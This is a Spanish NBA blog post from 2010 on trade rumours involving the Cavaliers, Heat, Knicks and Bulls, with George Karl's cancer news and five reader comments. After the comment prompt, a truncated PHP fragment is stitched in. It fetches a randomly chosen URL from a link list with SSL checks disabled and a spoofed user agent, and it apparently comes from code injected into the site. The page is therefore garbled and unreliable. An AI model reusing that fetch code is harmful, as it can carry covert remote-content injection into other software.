Buscando convencer a Lebron James

17 de February de 2010 por Love Denise

Ya es oficial el traspaso en el que los Blazers intercambian a Steve Blake, Travis Outlaw y 3 millones de dólares a cambio del pivot Marcus Camby. Ya lo hemos analizado en los comentarios de anteriores entradas así que tampoco hay mucho más que decir.

De lo que hay aún mucho que decir es de los movimientos de Cleveland. Parece ser que los Cavaliers se han decantado finalmente por Antawn Jamison y han hecho dos nuevas ofertas a Washington. En la primera de ellas, ofrecen a Ilgauskas, Jamario Moon y una primera ronda de draft, a cambio de Jamison y Mike James mientras que en la otra sería Shaquille O`Neal quien abandonaría la franquicia a cambio de Jamison y Mike Miller. Y si todo esto falla, aún se guardan una carta ofreciendo a Zydrunas Ilgauskas por Corey Magette. Sea cual sea la opción elegida, lo que parece claro es que los Cavs están haciendo todo lo posible por rodear a Lebron de extraordinarios jugadores para que el verano próximo firme nuevamente por los de Ohio.

Por su parte, los Heat de Miami, en su intento de apuntalar el equipo e intentar convencer a Wade que renueve, están intentando fichar a Amare Stoudemire. A cambio, estarían dispuestos a desprenderse de medio equipo ofreciendo a los ex-ganadores del concursos de triples Quentin Richardson y Daequan Cook, más Mario Chalmers, Dorrell Wright y una ronda de draft.

El que parece que no va a durar mucho en Washington es Drew Gooden, que tras entrar en el múltiple intercambio entre Mavs y Wizards, ya está negociando el buy-out con el equipo capitalino. Pretendientes no le faltan, como los propios Mavs, Bobcats, Nuggets y Bucks.

Minessotta podría desprenderse del genial ala-pivot Al Jefferson para recibir a cambio a Luol Deng y a Tyrus Thomas. Sería un gran refuerzo para los Bulls, que se harían con una potente pintura con el mencionado Jefferson y el francés Noah.

Otros que aparecen en todas las apuestas de movimientos son los Knicks que en su búsqueda de liberar salario para fichar el próximo verano a Lebron, Wade o Bosh, están muy interesados en el expiring de 22 millones de dólares de Tracy McGrady. A cambio estarían dispuestos a ofrecer a Jared Jeffries, Jordan Hill y Al Harrington o Larry Hughes. Tendrán que competir con la oferta de los Bulls por McGrady, en la que Tyrus Thomas, Hinrich, Salmons y Brad Miller llegarían a los Rockets. En otro frente abierto los Knicks también están cerca de cerrar el traspaso entre Nate Robinson y Eddie House.

Los Spurs también están buscando reforzarse y han puesto en el escaparate a todo el equipo, más los derechos de Tiago Splitter, exceptuando al quinteto titular: Parker, Jefferson, Ginobili, Blair y Duncan.

También se ha comentado en las últimas horas el interés de Memphis y de New York por el base español Sergio Rodriguez.

La noticia negativa del día, sin duda, es el anuncio del técnico de los Nuggets, George Karl, afirmando que padece por segunda vez cáncer y que deberá someterse a quimioterapia, debiendo, como es lógico, dejar de dirigir a los de Colorado hasta su posible recuperación.

Comenta

5 comentarios a esta entrada

  1. Kajie dice:
    #1

    Nate por House?
    ¿Donde hay que firmar?

      Citar

  2. Tobal dice:
    #2

    Ojo con Cleveland,que como fiche a Jamison es serio favorito al anillo,pues consiguen a un jugador que tiene mucha facilidad para anotar y rebotear,además de su versatilidad,ya que puede anotar desde el perímetro o en el poste bajo.

      Citar

  3. Dantley2 dice:
    #3

    Hay quien ya asegura que Nate Robinson está traspasado a Boston. Nada oficial, pero esperemos a ver.

      Citar

  4. Pirrimarzon dice:
    #4

    Lo que no tendría mucho sentido en este caso sería traspasar a Shaq para obtener a Jamison. Si quieren un arsenal interior interesante, es preferible que Shaq tenga a su alrededor a un 4 polivante y buen tirador desde el perímetro como Jamison, y no a Stoudemire, con el que no se compenetró en Phoenix. Eso sí, dar a Shaq ahora? Sería una locura.

    Saludos

      Citar

  5. pcerezo dice:
    #5

    Jamison a Cleveland por Ilgauskas. Supongo que Lebron estará firmando hoy mismo la renovación de su contrato. Se nos presenta un final de la NBA tremenda Lakers-Cleveland. I LOVE THIS GAME!!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>